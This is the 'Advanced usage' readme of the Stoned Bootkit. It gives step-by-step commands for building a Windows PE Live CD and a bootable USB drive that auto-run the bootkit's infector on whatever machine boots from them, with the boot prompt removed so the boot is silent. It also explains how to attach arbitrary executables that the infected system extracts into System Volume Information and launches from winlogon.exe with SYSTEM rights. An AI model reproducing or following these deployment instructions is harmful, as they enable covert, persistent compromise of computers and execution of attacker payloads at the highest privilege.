
  Advanced usage of the Stoned Bootkit

Please read the entire file Stoned v2 Introduction.txt and the legal explanation in there.
DO NOT ASK IF YOU DO NOT UNDERSTAND ANYTHING OF THIS FILE, ONLY FOR EXPERTS


=============
= Native CD =
=============

You can create the Native CD with \Boot Code\Image.bat and will be stored to \Boot Code\Images\Image Files\Native CD.iso
The infection only happens in memory, which is useful for testing.

NOTE: YOU NEED THE FULL PROPRIETARY Disk Module.sys, the one in the repository (the lite version) DOES NOT CONTAIN THE
NECESSARY CD FILE SYSTEM DRIVER!


===========
= Live CD =
===========

It is based on Windows PE, infects a system by booting from the CD.

1. Download the Windows AIK and install it
2. In the "Deployment Tools Command Prompt" execute "copype.cmd x86 c:\winpe_x86" to create the Windows PE Build Environment
3. Mount the image "Dism /Mount-Wim /WimFile:C:\winpe_x86\winpe.wim /index:1 /MountDir:C:\winpe_x86\mount"
4. Insert the infector executable

  1. Create a directory Stoned (in explorer) or in shell "mkdir C:\winpe_x86\mount\Stoned"
  2. Copy the Stoned infector executable "copy Infector.exe "C:\winpe_x86\mount\Stoned\Stoned Infector.exe""

That Stoned is executed, create a "Winpeshl.ini" file in the \System32 directory with following contents:

[LaunchApp]
AppPath = "%SYSTEMDRIVE%\Stoned\Stoned Infector.exe"

5. Commit the changes "Dism /Unmount-Wim /MountDir:C:\winpe_x86\mount /Commit"
6. Use the Windows Image (.wim) for the Live CD "copy c:\winpe_x86\winpe.wim c:\winpe_x86\ISO\sources\boot.wim"
7. No "Press any key to boot from CD" message: "del C:\winpe_x86\ISO\boot\bootfix.bin"
8. Create the iso "oscdimg -n -bC:\winpe_x86\etfsboot.com C:\winpe_x86\ISO C:\winpe_x86\Stoned LAE.iso"
9. That's it! Burn the iso to a CD or DVD.

Note the above instructions are only valid for the Windows 7 AIK, for the Vista AIK use the imagex tool instead of dism.
You can simply use the makefiles in this directory to create a Live CD, be sure to run them from the deployment command line prompt:

 - Create with 7 AIK.cmd              Live CD, based on Windows 7 AIK
 - Create with Vista AIK.cmd          Live CD, based on Windows Vista AIK
 - Create Live USB Flash Drive.cmd    Creating a bootable USB Flash Drive (execute this after you have created a Live CD)

Do not forget to put the Infector.exe in the same directory as the scripts, because they automatically copy it to the CD image.


============
= Live UFD =
============

Basically you have to do the same as if you would create the Live CD, up to step 8, so it continues with:

8. Connect your USB flash drive
9. Format it with NTFS (you can also format it with FAT32) using diskpart (type each line and press enter):

diskpart
select disk 1
clean
create partition primary
select partition 1
active
format quick fs=ntfs
assign
exit

WARNING! AT THIS STEP, BE SURE TO SELECT THE CORRECT DISK. In the deployment tools command line prompt type diskpart and then list disk, it will give you out something like:

DISKPART> list disk

  Datentr ###  Status      Gr��e    Frei     Dyn  GPT
  --------  ----------  -------  -------  ---  ---
       0    Online       466 GB      0 B
       1    Online       981 MB      0 B

In this example, disk 1 is my USB stick (compare the size). Be sure to set the correct number in the select command (above instructions).

10. Copy all the Windows PE files to the UFD "xcopy c:\winpe_x86\iso\*.* /e f:\" (specify instead of f: the drive letter of your UFD)

11. That's it! Restart your computer and boot from the UFD, you may have to manually select it in the boot menu (press F12 on startup)


==============================
= Add your custom executable =
==============================

You can add your own executable that gets NT-AUTHORITY\SYSTEM rights and is executed on startup. The infector (Protective Release build) 
must already be compiled for the following steps. First you must define all files you want to load in \Infector\Source\Loading File Table.lst.
An example looks like:

  0 8da19a3b12d6e94b8e9cf506e79975e8 calc.exe
  1 8da19a3b12d6e94b8e9cf506e79975e8 Taschenrechner.exe

The first character may be
  0 = just extract the file (overwrite if exists)
  1 = extract and start executable under winlogon.exe
  3 = inject dll into new remote svchost.exe process CURRENTLY UNDER DEVELOPMENT
  4 = extract the file if not exists CURRENTLY UNDER DEVELOPMENT
Following the first character must be a white space and a 32-byte unique hash which identifies the file. The third parameter (followed by
a white space) is the file name that is used when extracting it to the base directory.

In this example, it will store the 2 files to:
  C:\System Volume Information\Whistler\calc.exe              <- only extracted
  C:\System Volume Information\Whistler\Taschenrechner.exe    <- executed by CreateProcess() from winlogon.exe

This is the configuration files that defines which files should be executed/extracted etc. It must be set BEFORE compiling the Protective Release build.
Now you have to include the binaries to the infector, for this there is the program "Attach File.exe". It is located in \Infector\Protective Release\.
Call it for every file you want to attach:

  "Attach File.exe" Infector.exe calc.exe 8da19a3b12d6e94b8e9cf506e79975e8

That attaches calc.exe to the infector (encrypts it) and assigns the 32-byte hash to it. The hash in the loading file table and the one used here must
be the same, otherwise the bootkit can't find it! NOTE: You can attach the same file only once, rebuild the project/solution and then re-attach it.


======================
= PDF infector (poc) =
======================

Currently not available.
